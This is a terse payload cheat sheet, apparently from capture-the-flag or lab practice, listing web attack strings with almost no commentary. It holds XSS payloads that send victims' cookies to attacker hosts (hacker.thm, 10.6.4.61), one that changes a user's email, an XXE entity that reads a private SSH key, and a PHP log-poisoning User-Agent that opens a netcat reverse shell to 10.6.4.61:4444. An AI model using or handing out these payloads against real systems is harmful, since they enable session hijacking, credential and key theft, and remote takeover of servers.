# XSS
< img src='http://IP_A/RECURSO' />
< script src='http://IP_A/script' > </script>
<script>alert('XSS');</script>
<script>user.changeEmail('attacker@hacker.thm');</script>

# session stealing:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

# reflected xss
<script>var i=new Image;i.src="http://10.6.4.61:8888/?"+document.cookie;</script>

# cookie stealing
< img src=RECURSO onerror=this.src='http://IP_A/?cookies='+btoa(document.cookie) />

# XXE testing:
!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "TESTEANDO_XXE"> ]>
<post>
    <title>Example Post</title>
    <description>&example;</description>
    <markdown>Example Markdown</markdown>
</post>

# XXE file read:
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY test SYSTEM 'file:///home/roosa/.ssh/id_rsa'>]>
<post>
    <title>Example Post</title>
    <description>&test;></description>
    <markdown>Example Markdown></markdown>
</post>

# burp log poisoning:
User-Agent: <?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.4.61 4444 >/tmp/f') ?>
